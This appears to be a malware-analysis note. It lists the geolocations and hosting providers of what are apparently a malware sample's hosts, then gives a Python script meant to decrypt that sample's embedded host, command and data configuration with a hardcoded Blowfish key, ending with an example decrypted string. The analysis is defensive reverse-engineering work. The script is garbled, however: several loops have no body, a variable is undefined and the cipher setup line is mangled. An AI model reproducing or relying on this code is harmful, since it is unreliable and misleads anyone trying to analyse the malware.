Hosts	Canada|British Columbia|Coquitlam	AS11831|eSecureData	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	United States|Oregon|Portland	AS16509|, Inc.	Canada|British Columbia|Vancouver	AS11831|eSecureData	United States|Missouri|Saint Louis	AS30083|, LLC	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Utah|Ogden	AS53850|GorillaServers, Inc.	Canada|British Columbia|Vancouver	AS11831|eSecureData	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Missouri|Saint Louis	AS30083|, LLC	Canada|British Columbia|Vancouver	AS11831|eSecureData	United States|Missouri|Saint Louis	AS30083|, LLC	United States|California|San Jose	AS54600|PEG TECH INC	The Netherlands|Noord-Holland|Amsterdam	AS60781|LeaseWeb Netherlands B.V.	The Netherlands|Noord-Holland|Amsterdam	AS60781|LeaseWeb Netherlands B.V.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	Japan|Tokyo|Tokyo	AS16509|, Inc.	Japan|Tokyo|Tokyo	AS16509|, Inc.	Canada|British Columbia|Vancouver	AS11831|eSecureData	Canada|British Columbia|Vancouver	AS11831|eSecureData	Canada|British Columbia|Vancouver	AS11831|eSecureData	Canada|British Columbia|Vancouver	AS11831|eSecureData	United States|Missouri|Saint Louis	AS30083|, LLC	United States|Missouri|Saint Louis	AS30083|, LLC	United States|California|San Francisco	AS16509|, Inc.	United States|California|San Francisco	AS16509|, Inc.	China|Taiwan|Taipei City	AS16625|Akamai Technologies, Inc.	Canada|British Columbia|Coquitlam	AS11831|eSecureData	Canada|British Columbia|Coquitlam	AS11831|eSecureData	China|Hongkong|Hongkong	AS137443|Anchnet Asia Limited	United States|California|San Jose	AS54600|PEG TECH INC	Canada|Ontario|Toronto	AS174|Cogent Communications	The Netherlands|Noord-Holland|Haarlem	AS174|Cogent Communications	United States|Colorado|Denver	AS174|Cogent Communications	United States|None|None	AS396982|Google LLC	United States|California|Mountain View	AS396982|Google LLC


#python script ,which can decrypt the hosts,cmd,/data/.ms
#only test in ida7.6
#pip install pycryptodome

import struct
from Crypto.Cipher import Blowfish

tab = "./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

out = b""
mylist = []
output = []

for i in range(len(dec)):

for i in range(0,len(mylist),6):
    for j in range(6):

for i in output:
    s = struct.pack('>L', i)
    out += s

bl ="zAw2xidjP3eHQ", Blowfish.MODE_ECB)
plaintxt = bl.decrypt(out)
# plaintext  -->  1000@12.00AC:37:43:A1:0B:A7@0009@19944@\x00